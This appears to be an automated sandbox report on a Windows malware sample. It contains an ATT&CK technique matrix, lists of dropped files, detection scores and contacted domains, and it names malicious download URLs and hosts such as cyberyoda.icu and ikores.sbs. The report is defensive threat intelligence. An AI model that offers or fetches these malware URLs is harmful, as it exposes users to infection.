Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	1 Timestomp	NTDS	4 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	37 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	13 Process Injection	1 File Deletion	Cached Domain Credentials	11 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	DCSync	31 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	222 Masquerading	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\402438\Suicide.com	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI73BC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI744A.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7489.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7580.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7746.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI77E4.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7A65.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7A95.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7B61.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7B91.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi732E.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9F40.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9FAE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9FFD.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA03D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA1F4.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://cyberyoda.icu/lem.exe7	100%	Avira URL Cloud	malware
http://line.naver.jp0	0%	Avira URL Cloud	safe
https://drive-daily-2.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-preprod.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-4.corp.google.com/	0%	Avira URL Cloud	safe
https://ikores.sbs/	100%	Avira URL Cloud	malware
https://drive-daily-5.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-1.corp.google.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
www.google.com	142.250.181.100	true	false	high
ikores.sbs	5.75.212.196	true	true	unknown
cyberyoda.icu	45.130.41.93	true	true	unknown
LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb	unknown	unknown	false	unknown
ntp.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://ikores.sbs/	true	Avira URL Cloud: malware	unknown
https://t.me/m3wm0w	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cyberyoda.icu/lem.exe7	Setup.exe, 00000008.00000002.2201230145.0000013798328000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	NYMOHD.20.dr	false		high
http://anglebug.com/6651	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goto.google.com/sme-bugs2e	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/6574	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	NYMOHD.20.dr	false		high
https://anglebug.com/4830	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2970	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/shielded-email2B	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Suicide.com.11.dr, Speak.10.dr	false		high
http://anglebug.com/8162	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://crbug.com/368855.)	chrome.exe, 00000017.00000003.3152401909.0000597C00298000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/8280	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/220069903	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000017.00000003.3154727690.0000597C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155460305.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154701764.0000597C0117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154397854.0000597C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155554120.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154801355.0000597C01148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155523847.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154605550.0000597C0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7308	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2162	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	chrome.exe, 00000017.00000003.3172857148.0000597C00338000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5430	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4901	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3498	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-safebrowsing.fastly-edge.com/b	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/4966	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7319	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5421	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	Suicide.com, 00000014.00000000.2253361842.00000000006A9000.00000002.00000001.01000000.0000000C.sdmp, Suicide.com.11.dr, Curtis.10.dr	false		high
http://anglebug.com/7047	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/274859104	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://line.naver.jp0	lem.exe.8.dr, lem[1].exe.8.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/hats/index.htmlb	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6878	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://jsbin.com/temexa/4.	chrome.exe, 00000017.00000003.3154727690.0000597C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154397854.0000597C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154801355.0000597C01148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154605550.0000597C0112C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000017.00000003.3150440283.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001B.00000002.3292220755.00001ECC0016C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6755	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6876	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7724	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/_/og/promos/	chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000017.00000003.3154727690.0000597C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155460305.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154701764.0000597C0117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154397854.0000597C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155554120.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154801355.0000597C01148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155523847.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154605550.0000597C0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-4.corp.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	NYMOHD.20.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	lem.exe, 0000000A.00000002.2208770682.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, lem.exe, 0000000A.00000000.2200185978.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, lem.exe.8.dr, lem[1].exe.8.dr	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/LICENSE.txt	chrome.exe, 00000017.00000003.3154727690.0000597C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155460305.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154701764.0000597C0117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154397854.0000597C00F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155905954.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155554120.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154801355.0000597C01148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155523847.0000597C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3155590374.0000597C01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156144346.0000597C01288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3154605550.0000597C0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3156086256.0000597C011A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	NYMOHD.20.dr	false		high
https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut	chrome.exe, 00000017.00000003.3199996979.0000597C02C54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7172	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7899	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7279	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7036	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6860	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/2J	chrome.exe, 00000017.00000003.3141616011.00000B5000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3141486434.00000B500071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5658	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5535	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4324	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
